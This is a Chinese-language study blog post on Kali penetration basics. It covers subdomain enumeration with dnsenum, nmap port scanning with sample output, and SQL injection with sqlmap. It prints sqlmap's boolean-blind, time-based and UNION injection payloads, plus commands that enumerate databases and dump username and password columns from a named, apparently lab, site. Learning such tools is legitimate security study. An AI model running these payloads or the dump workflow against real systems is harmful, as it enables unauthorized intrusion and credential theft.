Kali渗透学习(1)——WEB端域名探测与端口扫描于sqlmap注入

Kali渗透学习(1)——WEB端域名探测与端口扫描

前言

学习Kali渗透已经将近半个月了，有必要记录以下自己的学习过程，以免遗忘

1.子域名探测

DNS服务是暴露信息的主要来源，一般安全性高的大型互联网址不容易发现漏洞，所以我们可以从子域名（比如三级域名）下手，而dnsenum是一款强大的域名信息收集工具，使用格式

dnsenum -f (-f指定收集用的字典文件)/usr/share/dnsenum/字典.txt +你要探测的域名或者ip

域名分级
一个完整的域名（.com、.net、.edu、.gov等）由二个或二个以上部分组成，各部分之间用英文的句号".“来分隔，最后一个”."的右边部分称为顶级域名 （Top-level Domain Name），顶级域名“.”的左边部分称为二级域名 （Second-level Domain Name），二级域名的左边部分称为三级域名，以此类推，每一级的域名控制它下一级域名的分配。
比如
.com的com就是顶级域名，其他还有像cn，edu，jp等等
二级域名是顶级域名下的域名，比如 baidu.com的baidu，而baidu.com是一个二级域名网址
如果在baidu.com的左边多加的一个主机名如：bbs.baidu.com，则称bbs.baidu.com为三级域名（重点说明，www.baidu.com 也是一个二级域名)
如果在bbs.baidu.com左边再多加加一个主机名如bai.bbs.baidu.com，则称bai.bbs.baidu.com为四级域名。
以此类推可以得到四级域名，五级域名等，不过一般三级域名以上的应用比较少。

2.端口扫描

当我们收集到子域名后，用nmap进行该域名的端口扫描

nmap -v 域名
常用的扫描参数
-sS TCP SYN扫描
-p 指定端口扫描
-v 显示扫描的过程，也可以使用 -vv
-Pn 当禁止ping后扫描参数
-A 全面的系统扫描

子域名有一些特征需要说明

open是开放端口，filtered是指被过滤的端口，nmap也不知道他是开放的还是关闭的，后面还列出了传输协议
PORT STATE SERVICE REASON
42/tcp filtered nameserver no-response
53/tcp filtered domain host-unreach ttl 54
80/tcp open http syn-ack ttl 53
81/tcp open hosts2-ns syn-ack ttl 54
135/tcp filtered msrpc no-response
139/tcp filtered netbios-ssn no-response
443/tcp open https syn-ack ttl 53
445/tcp filtered microsoft-ds no-response
593/tcp filtered http-rpc-epmap no-response

在域名后加上相关的端口，就可以访问了，或者还可以用namp指定端口扫描

3.尝试sqlmap注入

sqlmap -u(url) “http://尝试注入的urlxxxx.php?id=x”

这里sqlmap会返回是否存在诸如点，比如我这里的是基于布尔型盲注，或者也可以指定注入方式

sqlmap -u(url) “http://尝试注入的urlxxxx.php?id=x” --tech B

Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1’ AND 6609=6609 AND ‘gTaI’=‘gTaI
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1’ AND (SELECT 1038 FROM (SELECT(SLEEP(5)))vrpS) AND ‘bDyf’=‘bDyf
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-6063’ UNION ALL SELECT NULL,CONCAT(0x7171706a71,0x48664f574d6643655043716b7841666f414c51547664627461707355646855536e5a6559514e617a,0x717a706271),NULL-- ubNd

查看数据库

sqlmap -u(url) “http://尝试注入的urlxxxx.php?id=x” --dbs

查看某一数据库表单

sqlmap -u(url) “http://尝试注入的urlxxxx.php?id=x” -D 数据库名–tables

某一行字行内容抓取

sqlmap -u “http://xxx.xxx.com/xxxx.php?id=1” -D 数据库名 -T某一行名称 --columns

获得该段的内容

sqlmap -u “http://shop.aqlab.cn:8001/single.php?id=1” -D 数据库名 -T某一行名称 passwd,username(根据自己的扫描结果来写) --dump